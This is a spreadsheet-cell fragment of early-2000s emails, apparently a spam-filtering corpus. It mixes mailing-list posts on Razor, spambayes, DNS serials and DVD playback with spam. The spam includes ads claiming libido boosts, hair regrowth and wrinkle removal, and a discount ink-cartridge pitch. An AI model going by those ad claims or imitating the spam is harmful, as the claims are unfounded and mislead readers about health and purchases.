 &lt;br&gt;&lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;&lt;font color="#000000"&gt;&lt;font size=+0&gt;Increased
 Libido&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;&lt;font color="#000000"&gt;&lt;font size=+0&gt;Duration
 Of Penile Erection&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
 &lt;td WIDTH="199" HEIGHT="2"&gt;&lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;&lt;font color="#000000"&gt;&lt;font size=+0&gt;&amp;nbsp;New
 Hair Growth&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;&lt;font color="#000000"&gt;&lt;font size=+0&gt;&amp;nbsp;Improved
 Memory&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;&lt;font color="#000000"&gt;&amp;nbsp;Improved
 skin&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;&lt;font color="#000000"&gt;&amp;nbsp;New
 Hair Growth&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;&lt;font color="#000000"&gt;&amp;nbsp;Wrinkle
 Disappearance&amp;nbsp;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;&lt;/center&gt;
 &lt;center&gt;
 &lt;p&gt;&lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#FFFFFF"&gt;&lt;a href="http://www.the-savings-club.com"&gt;Visit
 Our Web Site and Lean The Facts: Click Here&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/center&gt;
 &lt;p&gt;&amp;nbsp;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;&lt;/center&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [Razor-users] empty mail is spamm?
</t>
  </si>
  <si>
    <t xml:space="preserve">Razor won't filter empty emails. What version of the agents are you using?
 cheers,
 vipul.
 On Mon, Sep 16, 2002 at 04:16:31PM +0300, Raido Kurel wrote:
 &gt; Hi,
 &gt; 
 &gt; Is it possible to use razor without filtering empty mails as spamm?
 &gt; An mail with an attachment is considered spamm. Is this normal?
 &gt; Or I mysqlf like to send emails to myself where all important is said in
 &gt; subject and body is empty (for remaining smth).
 &gt; 
 &gt; Thanks,
 &gt; Raido Kurel
 &gt; 
 &gt; 
 &gt; 
 &gt; 
 &gt; -------------------------------------------------------
 &gt; This sf.net email is sponsored by:ThinkGeek
 &gt; Welcome to geek heaven.
 &gt; http://thinkgeek.com/sf
 &gt; _______________________________________________
 &gt; Razor-users mailing list
 &gt; Razor-users@lists.sourceforge.net
 &gt; https://lists.sourceforge.net/lists/listinfo/razor-users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</si>
  <si>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Tom &lt;tomwhore@slack.net&gt; writes:
 &gt; MACROgenetic activites have decades on decades of testing...
 &gt; MICROgentic  activities DO NOT.
 An interesting idea I heard of was to use gene maps &amp; genetic info
 about animals to guide the breeding process - essentially shortening
 the iteration time with genetic information, but not touching any
 genes themselves.
 -- 
 Karl Anderson      kra@monkey.org           http://www.monkey.org/~kra/
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">[Skip Montanaro]
 &gt; I'm listed as a developer on SF and have the spambayes CVS module checked
 &gt; out using my SF username, but I'm unable to write to the repository.  CVS
 &gt; complains:
 &gt;
 &gt;     % cvs add unheader.py
 &gt;     cvs [server aborted]: "add" requires write access to the repository
 &gt;
 &gt; Any thoughts?
 Not really.  Try again?  About half the developers on the spambayes project
 were missing some permission or other, so I ran thru all of them and checked
 every damned box and clicked on every damn dropdown list I could find.  As
 far as SF is concerned, you're all sitting on God's Right Hand now, so if it
 still doesn't work I suggest you upgrade to Win98 &lt;wink&gt;.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: xine cannot play DVDs - "liba52: a52_block error"
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Jon wrote :
 &gt; Since libdvdcss-1.2.0, I have been unable to play DVDs using ogle, xine,
 &gt; vlc, or mplayer.  They all show a scrambled picture with (VERY) choppy
 &gt; audio.  When I run xine I see tons of these in the console: 
 &gt; 
 &gt; liba52: a52_block error
 &gt; liba52: a52_block error
 &gt; liba52: a52_block error
 &gt; liba52: a52_block error
 &gt; audio_out: inserting 5859 0-frames to fill a gap of 10989 pts
 &gt; metronom: audio jump
 &gt; liba52: a52_block error
 &gt; 
 &gt; Has anyone seen this before and know how to fix it?  Or should I file a
 &gt; bug report?  
 Hi,
 First of all, sorry for not replying to your private email from last week,
 but I really don't have a slight idea of what could be causing this!
 - Is this with different DVDs or a single one?
 - Is this using OSS or ALSA? Have you tried both?
 - Is this using binariy packages or recompiling source ones?
 I remember a user having trouble with a particular DVD ever since upgrading
 libdvdcss to a recent version, but haven't heard the end of the story.
 Matthias
 -- 
 Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
 Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10acpi
 Load : 0.07 0.20 0.21
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Mailing addresses against spam? Re: Al'Qaeda's fantasy ideology: Policy Review no. 114
</t>
  </si>
  <si>
    <t xml:space="preserve">Gordon Mohr wrote:
 &gt; Is this some new "I'm not spam" signal, to include a 
 &gt; valid mailing address?
 It's so you can still converse with him after the internet
 implodes due to spam and bankruptcy.
 - Joe
 -- 
 The Combatant State is your father and your mother, your only
 protector, the totality of your interests. No discipline can
 be stern enough for the man who denies that by word or deed.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [zzzzteana] Christians struck by lightning...
</t>
  </si>
  <si>
    <t xml:space="preserve">http://news.bbc.co.uk/2/hi/africa/2510637.stm
 It's a shame that these guys are some controversial sect --
 I'd be much more into it if these were mainstream and we
 could task the kneejerk Christians with this fact...
       /t
 -- 
 http://loopNY.com ......................An "open loop": shows every Saturday!
 http://extremeNY.com/submit .......................... submit to the calendar.
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Hi! I'm new here.
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_156E6_01C23EC0.4579FA60
 Content-Type: text/plain;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 We attempted to deliver this message to you with HTML formatting. =
 However, your e-mail program does not support HTML-enhanced messages. =
 Please go to your E-mail Settings for this group and change your E-mail =
 Preference to "Text only".
 http://groups.msn.com/OneIncomeLiving/_emailsettings.msnw
 MSN Groups
 ------=_NextPart_000_156E6_01C23EC0.4579FA60
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
   &lt;HTML&gt;
 &lt;HEAD&gt;
   &lt;META http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/HEAD&gt;
 &lt;BODY bgcolor=3D#FFFFFF leftmargin=3D"0" rightmargin=3D"0" =
 bottommargin=3D"0" topmargin=3D"0"&gt;&lt;BASEFONT face=3D"Arial, Helvetica, =
 Sans Serif" size=3D2&gt;
 &lt;STYLE type=3Dtext/css&gt;
 /* Foreground colors */
 .ThmFgColumnHeader, A.FrameLink, A.HeaderLink, A.FooterLink, A.LgtCmd, =
 A.MSNLink {color:#FFFFFF;}
 .ThmFgTitleLightBk {color:#FF6600;}
 .ThmFgNavLink, A.NavLink, A.ChildLink:hover {color:#666699;}
 .ThmFgInactiveText, A.SystemLink {color: #666666;}
 .ThmFgFrameTitle {color: #FFFFCC;}
 .ThmFgTitleDarkBk, A.NavLink:hover, A.TitleLink {color: #CC6600;}
 .ThmFgMiscText, A.Cat, A.SubCat {color: #336699;}
 .ThmFgCommand, A.Command, A.LargeCommand, A.MsgLink {color: #003366;}
 .ThmFgHeader {color: #333333;}
 .ThmFgStandard, A.SystemLink:hover, A.SubLink, A.ChildLink, A.StdLink, =
 SELECT.Standard {color: #000000;}
 .ThmFgDivider {color: #CCCCCC;} /* primarily for HR tags */
 /* Background colors */
 .ThmBgStandard {background-color: #FFFFFF;}
 .ThmBgUnknown1 {background-color: #FF6600;}
 .ThmBgFraming {background-color: #666699;}
 .ThmBgUnknown2 {background-color: #666666;}
 .ThmBgHighlightDark {background-color: #FFFFCC;}
 .ThmBgHighlightLight, #idToolbar {background-color: #FFFFE8;}
 .ThmBgTitleDarkBk {background-color: #F1F1F1;}
 .ThmBgAlternate {background-color: #ECF1F6;}
 .ThmBgUnknown3 {background-color: #CCCCFF;}
 .ThmBgDivider {background-color: #CCCCCC;}
 .ThmBgHeader {background-color: #9999CC;}
 .ThmBgLinks {background-color: #8696C9;}
 .ThmBgSharkBar {background-color: #8696C9;}
 &lt;/STYLE&gt;
 &lt;IMG border=3D0 width=3D1 height=3D1 =
 src=3D"http://c.msn.com/c.gif?NC=3D9523&amp;NA=3D34131&amp;PS=3D&amp;PI=3D26283&amp;DI=3D=
 416&amp;TP=3Dhttp://groups.msn.com"&gt;&lt;TABLE border=3D0 cellpadding=3D0 =
 cellspacing=3D0 width=3D"100%" class=3DThmBgAlternate&gt;
   &lt;TR valign=3D"middle"&gt;
     &lt;TD&gt;&lt;IMG align=3D"middle" border=3D"0" =
 src=3D"http://sc.communities.msn.com/themes/pby/img/mail/mlstar.gif"&gt;&lt;/TD=
 &gt;
     &lt;TD width=3D100%&gt;&lt;FONT face=3DArial, Helvetica, Sans Serif =
 class=3DThmFgTitleLightBk size=3D"4"&gt;New Message on &lt;A =
 href=3D"http://groups.msn.com/OneIncomeLiving"&gt;One Income =
 Living&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;
   &lt;/TR&gt;
   &lt;TR class=3DThmBgDivider&gt;&lt;TD colspan=3D2 width=3D"100%" height=3D"1" =
 colspan=3D"2"&gt;&lt;IMG border=3D"0" =
 src=3D"http://sc.communities.msn.com/img/c.gif" width=3D"100%" =
 height=3D"1"&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;BR&gt;
 &lt;BLOCKQUOTE&gt;
       &lt;A =
 href=3D"http://groups.msn.com/OneIncomeLiving/_notifications.msnw?type=3D=
 msg&amp;action=3Dshowdiscussion&amp;parent=3D1&amp;item=3D1396"&gt;&lt;B&gt;&lt;FONT =
 face=3D"Arial, Helvetica, Sans Serif" class=3DThmFgTitleLightBk =
 size=3D"2"&gt;Hi! I&amp;#39;m new here.&lt;/FONT&gt;&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;
     &lt;BR&gt;=09
     &lt;TABLE class=3DThmBgAlternate border=3D1 cellspacing=3D0 =
 cellpadding=3D2&gt;
       &lt;TR class=3DThmBgAlternate&gt;&lt;TD align=3Dcenter =
 background=3D"http://sc.communities.msn.com/themes/pby/img/mb/reply_bg.gi=
 f" nowrap&gt;&lt;A =
 href=3D"mailto:OneIncomeLiving@groups.msn.com?subject=3DRe%3A%20Hi%21%20I=
 %27m%20new%20here%2E" title=3D"Send a reply to this message."&gt;&lt;FONT =
 face=3D"Verdana,Arial,Helvetica,Sans Serif" class=3DThmFgCommand =
 size=3D"1"&gt;&lt;B&gt;Reply&lt;/B&gt;&lt;/FONT&gt;&lt;/A&gt;&lt;BR&gt;&lt;IMG border=3D0 width=3D80 =
 height=3D1 src=3D"http://sc.communities.msn.com/img/c.gif"&gt;&lt;/TD&gt;&lt;TD =
 width=3D100%&gt;
           &lt;TABLE border=3D0 cellpadding=3D0 cellspacing=3D0&gt;
             &lt;TR&gt;
                &lt;TD&gt;&amp;nbsp;&lt;/TD&gt;
                &lt;TD align=3Dleft width=3D100%&gt;&lt;FONT size=3D"1"&gt;
 		          &lt;A =
 href=3D"mailto:abcusa88@hotmail.com?subject=3DRe%3A%20Hi%21%20I%27m%20new=
 %20here%2E" title=3D"Send a reply to the sender of this message."&gt;&lt;FONT =
 face=3D"Verdana,Arial,Helvetica,Sans Serif" class=3DThmFgCommand =
 size=3D"1"&gt;&lt;B&gt;Reply to Sender&lt;/B&gt;&lt;/FONT&gt;&lt;/A&gt;
 		          &amp;nbsp;&amp;nbsp;&lt;/FONT&gt;&lt;A =
 href=3D"http://groups.msn.com/OneIncomeLiving/_notifications.msnw?type=3D=
 msg&amp;action=3Drecommend&amp;parent=3D1&amp;item=3D1396" title=3D"Increase the =
 number of recommendations for this message."&gt;&lt;IMG align=3Dmiddle =
 border=3D0 height=3D16 hspace=3D3 width=3D16 =
 src=3Dhttp://sc.communities.msn.com/themes/pby/img/mb/recommend.gif&gt;&lt;FONT=
  face=3D"Verdana,Arial,Helvetica,Sans Serif" class=3DThmFgCommand =
 size=3D"1"&gt;&lt;B&gt;Recommend&lt;/B&gt;&lt;/FONT&gt;&lt;/A&gt;
 			      &lt;/TD&gt;
                   &lt;TD align=3Dright nowrap&gt;&lt;FONT size=3D"1"&gt;Message 1 in =
 Discussion&lt;/FONT&gt;
                &lt;/TD&gt;                                =20
 		    &lt;/TR&gt;
 		  &lt;/TABLE&gt;
         &lt;/TD&gt;
       &lt;/TR&gt;&lt;TR&gt;        	   =20
         &lt;TD colspan=3D2&gt;&lt;TABLE border=3D0 cellpadding=3D4 =
 cellspacing=3D0 width=3D100%&gt;
 		    &lt;TR&gt;&lt;TD class=3DThmBgHighlightLight&gt;
 		      &lt;FONT face=3D"Arial, Helvetica, Sans Serif" =
 class=3DThmFgInactiveText size=3D"2"&gt;From: &lt;/FONT&gt;
 			  &lt;A =
 href=3D"http://groups.msn.com/OneIncomeLiving/profile?user=3Djoyful" =
 title=3D"View Member Information of sender."&gt;&lt;FONT face=3D"Arial, =
 Helvetica, Sans Serif" class=3DThmFgMiscText =
 size=3D"2"&gt;joyful&lt;/FONT&gt;&lt;/A&gt;
 			&lt;/TD&gt;&lt;/TR&gt;
 			&lt;TR&gt;&lt;TD class=3DThmBgStandard&gt;
 			  &lt;BR&gt;
               &lt;DIV&gt;&lt;IMG height=3D19 =
 src=3D"http://sc.communities.msn.com/themes/pby/img/emoticons/emteeth.gif=
 " width=3D19&gt;I just found out that using dry milk&amp;nbsp;can save half of =
 the money buying liquid milk, also save spaces in the frig. I recently =
 bought an extended warranty through the internet instead of dealer, =
 which saved me over $1000. I like&amp;nbsp;your group, there are great =
 suggestions. I'm thinking to work at home using my computer, but didn't =
 find anything yet. Anybody has updates?It is more important to me =
 to&amp;nbsp;make a little than save a little. Thank you all!&lt;/DIV&gt;&lt;/TD&gt;&lt;/TR&gt;
 		  &lt;/TABLE&gt;
 		&lt;/TD&gt;
       &lt;/TR&gt;
           &lt;/TABLE&gt;
   &lt;BR&gt;
     &lt;A href=3D"http://groups.msn.com/Browse?CatId=3D134"&gt;View other =
 groups in this category.&lt;/A&gt;
   &lt;BR&gt;
   &lt;BR&gt;
       &lt;!--WSSTRIPPABLEBEGIN--&gt;
     &lt;a =
 href=3D"http://g.msn.com/0ADW/136212.1??UIT=3D&amp;amp;TargetID=3D31706&amp;amp;C=
 txID=3D2&amp;amp;PID=3D308647&amp;amp;AN=3D8823" target=3D"_top"&gt;&lt;img =
 src=3D"http://global.msads.net/ads/WBCMON/002111790010_LG.gif" =
 alt=3D"Click Here!" height=3D"60" width=3D"468" border=3D"0" &gt;&lt;/a&gt;    =
 &lt;!--WSSTRIPPABLEEND--&gt;
 &lt;!--WSSTRIPPABLEBEGIN--&gt;&lt;P&gt;&lt;STYLE&gt;&lt;!--
 ADMSmLnk{font-family:verdana,system;color:#336699;text-decoration:none;}
 ADMSmLnk:hover{color:#ff6600;text-decoration:underline;}
 --&gt;&lt;/STYLE&gt;
 &lt;TABLE cellSpacing=3D0 cellPadding=3D0 width=3D500 border=3D0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD&gt;&lt;FONT face=3Dverdana color=3D#333366 size=3D1&gt;&lt;B&gt;Also on =
 MSN:&lt;/B&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;A class=3DADMSmLnk =
 href=3D"http://g.msn.com/2GRENUS/2_8085_01"&gt;&lt;FONT face=3Dverdana =
 color=3D#336699 size=3D1&gt;Start Chatting&lt;/FONT&gt;&lt;/A&gt;&amp;nbsp;&lt;FONT =
 face=3Dverdana color=3D#333366 size=3D1&gt;|&lt;/FONT&gt;&amp;nbsp;&lt;A =
 class=3DADMSmLnk href=3D"http://g.msn.com/2GRENUS/2_8085_02"&gt;&lt;FONT =
 face=3Dverdana color=3D#336699 size=3D1&gt;Listen to Music&lt;/FONT&gt;&lt;/A&gt;&lt;FONT =
 face=3Dverdana color=3D#336699 size=3D1&gt;&lt;/FONT&gt;&amp;nbsp;&lt;FONT =
 face=3Dverdana color=3D#333366 size=3D1&gt;|&lt;/FONT&gt;&amp;nbsp;&lt;A =
 class=3DADMSmLnk href=3D"http://g.msn.com/2GRENUS/2_8085_03"&gt;&lt;FONT =
 face=3Dverdana color=3D#336699 size=3D1&gt;House &amp;amp; Home&lt;/FONT&gt;&lt;/A&gt;&lt;FONT =
 face=3Dverdana color=3D#336699 size=3D1&gt;&lt;/FONT&gt;&amp;nbsp;&lt;FONT =
 face=3Dverdana color=3D#333366 size=3D1&gt;|&lt;/FONT&gt;&amp;nbsp;&lt;A =
 class=3DADMSmLnk href=3D"http://g.msn.com/2GRENUS/2_8085_04"&gt;&lt;FONT =
 face=3Dverdana color=3D#336699 size=3D1&gt;Try Online =
 Dating&lt;/FONT&gt;&lt;/A&gt;&lt;FONT face=3Dverdana color=3D#336699 =
 size=3D1&gt;&lt;/FONT&gt;&amp;nbsp;&lt;FONT face=3Dverdana color=3D#333366 =
 size=3D1&gt;|&lt;/FONT&gt;&amp;nbsp;&lt;A class=3DADMSmLnk =
 href=3D"http://g.msn.com/2GRENUS/2_8085_05"&gt;&lt;FONT face=3Dverdana =
 color=3D#336699 size=3D1&gt;Daily Horoscopes&lt;/FONT&gt;&lt;/A&gt;&lt;FONT face=3Dverdana =
 color=3D#336699 size=3D1&gt;&lt;/FONT&gt;=20
 &lt;TD&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/P&gt;&lt;!--WSSTRIPPABLEEND--&gt;&lt;/BLOCKQUOTE&gt;
 &lt;!--WSSTRIPPABLEBEGIN--&gt;
 &lt;TABLE border=3D0 cellpadding=3D0 cellspacing=3D0 width=3D"100%"&gt;
   &lt;TR class=3DThmBgDivider&gt;&lt;TD width=3D"100%" height=3D"1""&gt;&lt;img =
 border=3D"0" src=3D"http://sc.communities.msn.com/img/c.gif" =
 width=3D"100%" height=3D"1"&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD width=3D"100%" class=3DThmBgAlternate&gt;
       &lt;BLOCKQUOTE&gt;
       &lt;FONT face=3D"Arial, Helvetica, Sans Serif" class=3DThmFgStandard =
 size=3D"1"&gt;
         &lt;BR&gt;
                   To stop getting this e-mail, or change how often it =
 arrives, go to your &lt;A =
 href=3D"http://groups.msn.com/OneIncomeLiving/_emailsettings.msnw"&gt;&lt;FONT =
 class=3DThmFgMiscText&gt;E-mail Settings&lt;/FONT&gt;&lt;/A&gt;.          &lt;BR&gt;&lt;BR&gt;
 		                  Need help? If you've forgotten your password, please =
 go to &lt;A =
 href=3D"http://groups.msn.com/_passportredir.msnw?ppmprop=3Dhelp"&gt;&lt;FONT =
 class=3DThmFgMiscText&gt;Passport Member Services&lt;/FONT&gt;&lt;/A&gt;.          &lt;BR&gt;
 		                  For other questions or feedback, go to our &lt;A =
 href=3D"http://groups.msn.com/contact"&gt;&lt;FONT =
 class=3DThmFgMiscText&gt;Contact Us&lt;/FONT&gt;&lt;/A&gt; page.          &lt;BR&gt;&lt;BR&gt;
 		                  If you do not want to receive future e-mail from =
 this MSN group, or if you received this message by mistake, please click =
 the "Remove" link below. On the pre-addressed e-mail message that opens, =
 simply click "Send". Your e-mail address will be deleted from this =
 group's mailing list.
           &lt;BR&gt;
             &lt;A href=3D"mailto:OneIncomeLiving-remove@groups.msn.com" =
 title=3D"Send a request to have your e-mail removed from this =
 group."&gt;&lt;FONT class=3DThmFgMiscText&gt;Remove my e-mail address from One =
 Income Living.&lt;/FONT&gt;&lt;/A&gt;
 		      &lt;/BLOCKQUOTE&gt;
     &lt;/TD&gt;
   &lt;/TD&gt;
 &lt;/TABLE&gt;
 &lt;!--WSSTRIPPABLEEND--&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
 ------=_NextPart_000_156E6_01C23EC0.4579FA60--
</t>
  </si>
  <si>
    <t xml:space="preserve">
 -----BEGIN PGP SIGNED MESSAGE-----
 Hash: SHA1
 Your actual serial number is 1519761310 - from a dig I've just done.
 Try resetting the zone number to 2002082901 - some of your secondaries seem 
 to have a serial number below that, so they clearly regard 1519761310 as 
 being less than 2002082601.
 That should enable them to pick up the new zonefile.
 T.
 At 11:49 02/09/2002 +0100, Ray Dermody wrote:
 &gt;Hi All,
 &gt;The serial number in our hosts files on our DNS server has gone
 &gt;corrupt e.g. 2002082999999999901 should be 20002082901.
 &gt;Its okay to set this back to todays date but I understand that our
 &gt;secondary and terninary DNS servers will only update from the master
 &gt;hosts file if the master host serial number is greater than the current
 &gt;serial number in the hosts file.
 &gt;Is there any way I can reset this on the secondary and terninary DNS
 &gt;servers?
 &gt;
 &gt;Ray Dermody
 &gt;Computing Services Technician
 &gt;I.T. Carlow
 &gt;0503 76271
 &gt;
 &gt;
 &gt;--
 &gt;Irish Linux Users' Group: ilug@linux.ie
 &gt;http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 &gt;List maintainer: listmaster@linux.ie
 VIA NET.WORKS Ireland is a wholly owned Limited Irish Company.
 Although connected to the VIA Global Network, VIA NET.WORKS Ireland
 is separate from and is not owned by VIA NET.WORKS Inc. or any
 member of the VIA NET.WORKS Inc. Group.
 -----BEGIN PGP SIGNATURE-----
 Version: PGPfreeware 7.0.3 for non-commercial use &lt;http://www.pgp.com&gt;
 iQA/AwUBPXNFo76WYZbx1eG3EQLfNwCfakNapOkbg26j1jqQQEHgIWFd4s0AoP4J
 GLBtgr1K8fzYlnnRNcfT3fSt
 =Rurr
 -----END PGP SIGNATURE-----
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt;&gt;&gt;&gt;&gt; "GW" == Greg Ward &lt;gward@python.net&gt; writes:
     GW&gt; If you (and Guido, Barry, et. al.) prefer, I could change that
     GW&gt; last statement to "folder = None", so the mail won't be saved
     GW&gt; at all.
 I don't care if the mail is foldered on python.org, but personal
 messages regardless of who they're for, shouldn't be part of the
 public spambayes repository unless specifically approved by both the
 recipient and sender.
 Note also that we are much more liberal about python.org/zope.org
 mailing list traffic than most folks.  Read list-managers for any
 length of time and you'll find that there are a lot of people who
 assert strict copyright over their collections, are very protective of
 their traffic, and got really pissed when gmane just started
 gatewaying their messages without asking.
 Which might be an appropriate for their lists, but not for ours (don't
 think I'm suggesting we do the same -- I /like/ our laissez-faire
 approach).
 But for personal email, we should be more careful.
 -Barry
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Make your prints beautiful &amp; SAVE BIG!            14144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</si>
  <si>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&lt;title&gt;Do you Have an Inkjet or Laser Printer?&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;div align=3D"left"&gt;
   &lt;table border=3D"2" width=3D"420" height=3D"55" bordercolor=3D"#FFFFFF" =
 bordercolorlight=3D"#FFFF00" bordercolordark=3D"#000080" bgcolor=3D"#00000=
 0"&gt;
     &lt;tr&gt;
       &lt;td width=3D"100%" height=3D"49" align=3D"center" bgcolor=3D"#000000=
 " bordercolor=3D"#C0C0C0" style=3D"border-right-style: solid; border-right=
 -color: #C0C0C0"&gt;&amp;nbsp;
         &lt;div align=3D"center"&gt;
           &lt;center&gt;
           &lt;table border=3D"1" width=3D"99%" height=3D"11" bordercolor=3D"#=
 000000"&gt;
             &lt;tr&gt;
               &lt;td width=3D"100%" height=3D"5" align=3D"center" bgcolor=3D"=
 #FFFF00" style=3D"color: #FFFFFF; font-size: 10pt; font-weight: bold"&gt;&lt;b&gt;&lt;=
 font face=3D"Verdana" size=3D"3" color=3D"#000000"&gt;Do
         you Have an Inkjet or Laser Printer?&lt;/font&gt;&lt;/b&gt;
               &lt;/td&gt;
             &lt;/tr&gt;
           &lt;/table&gt;
           &lt;/center&gt;
         &lt;/div&gt;
         &lt;p&gt;&lt;b&gt;&lt;font face=3D"Verdana" size=3D"3" color=3D"#FFFFFF"&gt;Yes? The=
 n we can &lt;/font&gt;&lt;font face=3D"Verdana" size=3D"3" color=3D"#FFFF99"&gt;SAVE&lt;/=
 font&gt;&lt;font face=3D"Verdana" size=3D"3" color=3D"#FFFFFF"&gt;
         you &lt;/font&gt;&lt;font face=3D"Verdana" size=3D"3" color=3D"#FFFF99"&gt;$$$=
 &lt;/font&gt;&lt;font face=3D"Verdana" size=3D"3" color=3D"#FFFFFF"&gt; Money!&lt;/font&gt;&lt;=
 /b&gt;&lt;/p&gt;
         &lt;p&gt;&lt;b&gt;&lt;font size=3D"3" color=3D"#FFFFFF"&gt;&lt;font face=3D"Verdana"&gt;Ou=
 r High Quality Ink &amp; Toner Cartridges come
         with a money-back guarantee,&lt;/font&gt; &lt;font face=3D"Verdana"&gt;a 1-yea=
 r
         Warranty*, and get &lt;/font&gt;&lt;/font&gt;&lt;i&gt;&lt;font face=3D"Verdana" size=3D=
 "3" color=3D"#FFFF99"&gt;&lt;u&gt;FREE 3-Day SHIPPING
         &lt;/u&gt;!*&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;&lt;/p&gt;
         &lt;p&gt;&lt;b&gt;&lt;font face=3D"Verdana" size=3D"3" color=3D"#FFFFFF"&gt;and best=
  of all...They Cost
         &lt;/font&gt;&lt;font face=3D"Verdana" size=3D"3" color=3D"#FFFF99"&gt; up to =
 80% &lt;/font&gt; &lt;i&gt;&lt;u&gt;&lt;font face=3D"Verdana" color=3D"#FFFF99" size=3D"4"&gt;Less=
 &lt;/font&gt;&lt;/u&gt;&lt;/i&gt;
         &lt;font face=3D"Verdana" size=3D"3" color=3D"#FFFFFF"&gt;
         than
         Retail Price!&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
         &lt;div align=3D"center"&gt;
           &lt;center&gt;
           &lt;table border=3D"1" width=3D"99%" height=3D"11" bordercolor=3D"#=
 000000"&gt;
             &lt;tr&gt;
               &lt;td width=3D"100%" bgcolor=3D"#FFFF00" align=3D"center" styl=
 e=3D"color: #FFFFFF" bordercolor=3D"#000000"&gt;
         &lt;p&gt;&lt;b&gt;&lt;font face=3D"Verdana" size=3D"3" color=3D"#00CC99"&gt;&lt;a style=
 =3D"color: #000000; font-weight: bold" href=3D"http://www.superink.net/"&gt;*=
 Click here
         to visit Our Website!*&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
               &lt;/td&gt;
             &lt;/tr&gt;
           &lt;/table&gt;
           &lt;/center&gt;
         &lt;/div&gt;
         &lt;p&gt;&lt;b&gt;&lt;u&gt;&lt;font size=3D"4" color=3D"#FFFFFF"&gt;or Call us Toll-Free @
         1-800-758-8084!&lt;/font&gt;&lt;/u&gt;&lt;/b&gt;
         &lt;p&gt;&lt;font size=3D"1" face=3D"Arial" color=3D"#C0C0C0"&gt;*90-day warra=
 nty on remanufactured
         cartridges. Free shipping on orders over $40&lt;/font&gt;&lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
 &lt;/div&gt;
 &lt;br&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;div align=3D"left"&gt;
           &lt;table border=3D"0" width=3D"420" height=3D"42" bgcolor=3D"#0000=
 00"&gt;
             &lt;tr&gt;
               &lt;td width=3D"100%" height=3D"36" align=3D"center" style=3D"f=
 ont-family: Palatino Linotype; font-size: 8pt; color: #FFFFFF"&gt;&lt;font face=3D=
 "Verdana" size=3D"1" color=3D"#FFFFFF"&gt;You
                 are receiving this special offer because you have provided=
 &lt;/font&gt;&lt;font face=3D"Verdana" size=3D"1" color=3D"#000000"&gt;
                 &lt;/font&gt;&lt;font face=3D"Verdana" size=3D"1" color=3D"#FFFFFF"=
 &gt;
                 permission to receive email communications regarding speci=
 al
                 online promotions or offers. If you feel you have received=
  this
                 message in error, or wish to be removed from our subscribe=
 r
                 list, &lt;a href=3D"mailto:print1@btamail.net.cn" style=3D"co=
 lor: #FF0000"&gt;Click HERE&lt;/a&gt;
                 and then click send, and you will be removed within three =
 business days.
                 Thank You and we apologize for ANY inconvenience.&lt;/font&gt;&lt;/=
 td&gt;
             &lt;/tr&gt;
           &lt;/table&gt;
 &lt;/div&gt;
